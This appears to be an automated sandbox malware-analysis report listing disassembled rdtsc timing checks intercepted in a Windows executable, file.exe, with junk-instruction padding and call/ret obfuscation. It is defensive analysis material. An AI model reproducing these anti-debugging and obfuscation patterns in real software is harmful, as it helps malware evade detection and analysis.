                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6067DC second address: 6067F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FC0712A538Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 606A84 second address: 606A8E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC070C936F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607445 second address: 607449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6076FA second address: 607700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607700 second address: 607704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607704 second address: 607712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FC070C936F6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C07E second address: 60C082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60A95F second address: 60A983 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070C93706h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FC070C936F6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C16F second address: 60C173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F71B second address: 60F721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F721 second address: 60F72B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F72B second address: 60F731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F731 second address: 60F747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FC0712A538Ch 0x0000000b jne 00007FC0712A5386h 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F747 second address: 60F74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DAD02 second address: 5DAD1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC0712A5393h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DAD1B second address: 5DAD20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DAD20 second address: 5DAD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC0712A5386h 0x0000000a jmp 00007FC0712A5390h 0x0000000f popad 0x00000010 jmp 00007FC0712A5397h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DAD5F second address: 5DAD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070C93705h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DAD7B second address: 5DAD81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DAD81 second address: 5DAD85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6122C5 second address: 6122F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0712A5394h 0x00000007 jmp 00007FC0712A538Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007FC0712A53A0h 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6122F3 second address: 6122F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6125E8 second address: 612605 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0712A538Ch 0x00000007 jno 00007FC0712A5386h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612605 second address: 61261E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 je 00007FC070C936FEh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61261E second address: 612622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612789 second address: 6127B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070C936FBh 0x00000009 popad 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC070C93708h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612BC7 second address: 612BCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612D24 second address: 612D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC070C936F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612D30 second address: 612D35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612D35 second address: 612D3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D91AC second address: 5D91D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0712A5399h 0x00000007 jo 00007FC0712A5386h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D91D4 second address: 5D91D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D91D9 second address: 5D9204 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0712A5391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f jnc 00007FC0712A5390h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9204 second address: 5D921F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC070C93707h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D921F second address: 5D9232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0712A538Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616948 second address: 61694F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61694F second address: 616961 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a jc 00007FC0712A5392h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617A4E second address: 617A54 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617A54 second address: 617A81 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC0712A5390h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FC0712A538Eh 0x00000013 jg 00007FC0712A5386h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617A81 second address: 617A8B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC070C936FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617DE1 second address: 617DE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617E4D second address: 617E53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618038 second address: 618053 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0712A5397h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6184D0 second address: 6184E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC070C936F6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6184E3 second address: 6184E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6184E7 second address: 6184EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6184EB second address: 6184F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61856E second address: 618572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6186E7 second address: 618710 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0712A5391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FC0712A538Eh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6188C7 second address: 6188CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618ED6 second address: 618EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FC0712A5386h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618EE0 second address: 618EE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618EE4 second address: 618EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jc 00007FC0712A538Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618EF6 second address: 618EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618FB5 second address: 618FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 619923 second address: 6199AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070C1F319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a xor dword ptr [ebp+122D2803h], edi 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FC070C1F308h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov dword ptr [ebp+1245D1EAh], esi 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007FC070C1F308h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000017h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e sub dword ptr [ebp+122D1E21h], edi 0x00000054 xchg eax, ebx 0x00000055 pushad 0x00000056 pushad 0x00000057 jmp 00007FC070C1F315h 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A992 second address: 61A996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A996 second address: 61A99C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61B4DF second address: 61B4E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61BC79 second address: 61BC7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61BC7D second address: 61BC83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61CA10 second address: 61CA60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov esi, dword ptr [ebp+122D29AFh] 0x00000011 push 00000000h 0x00000013 or esi, 6511F943h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007FC070C1F308h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 and di, 3A52h 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e jp 00007FC070C1F306h 0x00000044 pop eax 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D520 second address: 61D524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D524 second address: 61D56B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jns 00007FC070C1F312h 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D1E01h], esi 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D2D1Dh] 0x0000001d push 00000000h 0x0000001f sbb esi, 1419C673h 0x00000025 xchg eax, ebx 0x00000026 jnc 00007FC070C1F30Eh 0x0000002c push eax 0x0000002d pushad 0x0000002e pushad 0x0000002f push esi 0x00000030 pop esi 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6229D4 second address: 6229DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6229DA second address: 6229DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6229DE second address: 6229F2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b mov cx, dx 0x0000000e nop 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622B84 second address: 622B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622B89 second address: 622B8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622B8F second address: 622B93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622CD0 second address: 622CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622CD4 second address: 622CDA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622CDA second address: 622CDF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62306E second address: 623099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D5A12h], edx 0x0000000f push 0000001Eh 0x00000011 nop 0x00000012 pushad 0x00000013 push ebx 0x00000014 jmp 00007FC070C1F312h 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623099 second address: 62309D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62309D second address: 6230B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC070C1F30Bh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623454 second address: 623458 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623458 second address: 623473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC070C1F310h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623473 second address: 62347D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657139 second address: 65713F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65713F second address: 657144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657144 second address: 65714A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6572BF second address: 6572C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6572C3 second address: 6572D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6572D0 second address: 6572E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 popad 0x0000000a pushad 0x0000000b jo 00007FC070F37E3Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65749B second address: 6574AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007FC070C1F306h 0x0000000b popad 0x0000000c jnc 00007FC070C1F30Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65761B second address: 657625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657625 second address: 657630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC070C1F306h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65779C second address: 6577A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6577A2 second address: 6577D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FC070C1F313h 0x0000000c pop ebx 0x0000000d popad 0x0000000e pushad 0x0000000f push ecx 0x00000010 je 00007FC070C1F306h 0x00000016 jmp 00007FC070C1F30Ch 0x0000001b pop ecx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66143C second address: 661440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65FF58 second address: 65FF5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65FF5F second address: 65FF91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070F37E42h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC070F37E47h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 660117 second address: 660138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070C1F318h 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 660332 second address: 66033C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6605E9 second address: 6605F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FC070C1F306h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6605F5 second address: 6605F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
